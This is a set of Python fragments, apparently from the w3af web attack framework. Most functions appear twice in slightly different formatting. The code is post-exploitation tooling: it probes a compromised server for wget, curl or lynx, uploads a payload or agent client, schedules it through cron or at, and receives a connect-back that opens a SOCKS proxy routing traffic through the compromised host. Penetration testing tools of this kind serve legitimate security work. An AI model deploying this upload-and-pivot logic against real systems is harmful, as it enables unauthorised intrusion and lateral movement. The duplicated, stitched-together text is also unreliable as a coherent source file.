def test_get_remote_temp_file_windows(self):
exec_method = MagicMock(side_effect=[
'Command not found', 'Command not found', '[fonts]', 'ECHO',
'C:\\Windows\\Temp\\', 'File not found'
])
tempfile = get_remote_temp_file(exec_method)
self.assertTrue(tempfile.startswith('C:\\Windows\\Temp\\'))
def test_get_remote_temp_file_windows(self):
exec_method = MagicMock(
side_effect=['Command not found', 'Command not found',
'[fonts]', 'ECHO', 'C:\\Windows\\Temp\\',
'File not found'])
tempfile = get_remote_temp_file(exec_method)
self.assertTrue(tempfile.startswith('C:\\Windows\\Temp\\'))
def _sendExtrusionClient(self):
interpreter, extrusionClient, extension = self._selectExtrusionClient()
remoteFilename = get_remote_temp_file(self._exec_method)
remoteFilename += "." + extension
# do the transfer
apply(self._transferHandler.transfer, (extrusionClient, remoteFilename))
return interpreter, remoteFilename
def _sendExtrusionClient(self):
interpreter, extrusionClient, extension = self._selectExtrusionClient()
remoteFilename = get_remote_temp_file(self._exec_method)
remoteFilename += '.' + extension
# do the transfer
apply(self._transferHandler.transfer,
(extrusionClient, remoteFilename))
return interpreter, remoteFilename
def can_transfer(self):
'''
This method is used to test if the transfer method works as expected.
The implementation of this should transfer 10 bytes and check if they
arrived as expected to the other end.
'''
# Here i test what remote command we can use to fetch the payload
for fetcher in ['wget', 'curl', 'lynx']:
res = self._exec_method('which ' + fetcher)
if res.startswith('/'):
# Almost there...
self._command = fetcher
try:
# Lets test if the transfer method works.
return self.transfer('test_string\n',
get_remote_temp_file(self._exec_method))
except:
continue
return False
def _send_exe_to_server(self, exe_file):
'''
This method should be implemented according to the remote operating system. The idea here is to
send the exe_file to the remote server and save it in a file.
:param exe_file: The local path to the executable file
:return: The name of the remote file that was uploaded.
'''
om.out.debug('Called _send_exe_to_server()')
om.out.console(
'Wait while w3af uploads the payload to the remote server...')
ptf = payload_transfer_factory(self._exec_method)
# Now we get the transfer handler
wait_time_for_extrusion_scan = ptf.estimate_transfer_time()
transferHandler = ptf.get_transfer_handler()
if not transferHandler.can_transfer():
raise w3afException('Can\'t transfer the file to remote host, can_transfer() returned False.')
else:
om.out.debug(
'The transferHandler can upload files to the remote end.')
estimatedTime = transferHandler.estimate_transfer_time(
len(exe_file))
om.out.debug('The payload transfer will take "' +
str(estimatedTime) + '" seconds.')
self._remote_filename = get_remote_temp_file(self._exec_method)
om.out.debug('Starting payload upload, remote filename is: "' +
self._remote_filename + '".')
if transferHandler.transfer(file(exe_file).read(), self._remote_filename):
om.out.console(
'Finished payload upload to "%s"' % self._remote_filename)
return self._remote_filename
else:
raise w3afException(
'The payload upload failed, remote md5sum is different.')
def can_transfer(self):
'''
This method is used to test if the transfer method works as expected.
The implementation of this should transfer 10 bytes and check if they
arrived as expected to the other end.
'''
# Here i test what remote command we can use to fetch the payload
for fetcher in ['wget', 'curl', 'lynx']:
res = self._exec_method('which ' + fetcher)
if res.startswith('/'):
# Almost there...
self._command = fetcher
try:
# Lets test if the transfer method works.
return self.transfer(
'test_string\n',
get_remote_temp_file(self._exec_method))
except:
continue
return False
def test_get_remote_temp_file_linux(self):
exec_method = commands.getoutput
tempfile = get_remote_temp_file(exec_method)
self.assertTrue(tempfile.startswith('/tmp/'))
def __init__(self, exec_method):
self._exec_method = exec_method
self._cronFile = get_remote_temp_file(self._exec_method)
def run(self):
'''
Entry point for the whole process.
'''
# First, I have to check if I have a good w3afAgentClient to send to the
# other end...
try:
interpreter, client_code, extension = self._select_client()
except w3afException:
om.out.error(
'Failed to find a suitable w3afAgentClient for the remote server.'
)
else:
#
# Get a port to use. Extrusion scan or any other method is applied here.
#
inbound_port = self._get_inbound_port()
#
# Start the w3afAgentServer on this machine
#
agent_server = w3afAgentServer(self._ip_address,
socks_port=self._socks_port,
listen_port=inbound_port)
self._agent_server = agent_server
agent_server.start()
# Wait for it to start.
time.sleep(0.5)
if not agent_server.is_running():
om.out.error(agent_server.get_error())
else:
#
# Now that everything is setup here, transfer the client
# to the remote end and run it.
#
ptf = payload_transfer_factory(self._exec_method)
transferHandler = ptf.get_transfer_handler(inbound_port)
if not transferHandler.can_transfer():
raise w3afException(
'Can\'t transfer w3afAgent client to remote host, can_transfer() returned False.'
)
else:
# Let the user know how much time it will take to transfer the file
estimatedTime = transferHandler.estimate_transfer_time(
len(client_code))
om.out.debug('The w3afAgent client transfer will take "' +
str(estimatedTime) + '" seconds.')
filename = get_remote_temp_file(self._exec_method)
filename += '.' + extension
# Upload the file and check integrity
om.out.console(
'Starting w3afAgent client upload, remote filename is: "%s" ...'
% filename)
upload_success = transferHandler.transfer(
client_code, filename)
if not upload_success:
raise w3afException(
'The w3afAgent client failed to upload. Remote file hash does NOT match.'
)
om.out.console('Finished w3afAgent client upload!')
# And now start the w3afAgentClient on the remote server using cron / at
self._delayedExecution(interpreter + ' ' + filename + ' ' +
self._ip_address + ' ' +
str(inbound_port))
#
# This checks if the remote server connected back to the agent_server
#
if not agent_server.is_working():
om.out.console(
'Something went wrong, the w3afAgent client failed to connect back.'
)
else:
msg = 'A SOCKS proxy is listening on %s:%s' % (
self._ip_address, self._socks_port)
msg += ' , all connections made through this daemon will be routed '
msg += ' through the compromised server. We recommend using the proxychains tool '
msg += ' ("apt-get install proxychains") to route connections through the proxy, the '
msg += ' proxy configuration should look like "socks4 %s %s"' % (
self._ip_address, self._socks_port)
om.out.console(msg)
def test_get_remote_temp_file_linux(self):
exec_method = commands.getoutput
tempfile = get_remote_temp_file(exec_method)
self.assertTrue(tempfile.startswith('/tmp/'))
def __init__(self, exec_method):
self._exec_method = exec_method
self._cronFile = get_remote_temp_file(self._exec_method)
def run(self):
'''
Entry point for the whole process.
'''
# First, I have to check if I have a good w3afAgentClient to send to the
# other end...
try:
interpreter, client_code, extension = self._select_client()
except w3afException:
om.out.error('Failed to find a suitable w3afAgentClient for the remote server.')
else:
#
# Get a port to use. Extrusion scan or any other method is applied here.
#
inbound_port = self._get_inbound_port()
#
# Start the w3afAgentServer on this machine
#
agent_server = w3afAgentServer(self._ip_address,
socks_port=self._socks_port,
listen_port=inbound_port)
self._agent_server = agent_server
agent_server.start()
# Wait for it to start.
time.sleep(0.5)
if not agent_server.is_running():
om.out.error(agent_server.get_error())
else:
#
# Now that everything is setup here, transfer the client
# to the remote end and run it.
#
ptf = payload_transfer_factory(self._exec_method)
transferHandler = ptf.get_transfer_handler(inbound_port)
if not transferHandler.can_transfer():
raise w3afException('Can\'t transfer w3afAgent client to remote host, can_transfer() returned False.')
else:
# Let the user know how much time it will take to transfer the file
estimatedTime = transferHandler.estimate_transfer_time(
len(client_code))
om.out.debug('The w3afAgent client transfer will take "' +
str(estimatedTime) + '" seconds.')
filename = get_remote_temp_file(self._exec_method)
filename += '.' + extension
# Upload the file and check integrity
om.out.console('Starting w3afAgent client upload, remote filename is: "%s" ...' % filename)
upload_success = transferHandler.transfer(
client_code, filename)
if not upload_success:
raise w3afException('The w3afAgent client failed to upload. Remote file hash does NOT match.')
om.out.console('Finished w3afAgent client upload!')
# And now start the w3afAgentClient on the remote server using cron / at
self._delayedExecution(interpreter + ' ' + filename + ' ' + self._ip_address + ' ' + str(inbound_port))
#
# This checks if the remote server connected back to the agent_server
#
if not agent_server.is_working():
om.out.console('Something went wrong, the w3afAgent client failed to connect back.')
else:
msg = 'A SOCKS proxy is listening on %s:%s' % (
self._ip_address, self._socks_port)
msg += ' , all connections made through this daemon will be routed '
msg += ' through the compromised server. We recommend using the proxychains tool '
msg += ' ("apt-get install proxychains") to route connections through the proxy, the '
msg += ' proxy configuration should look like "socks4 %s %s"' % (self._ip_address, self._socks_port)
om.out.console(msg)
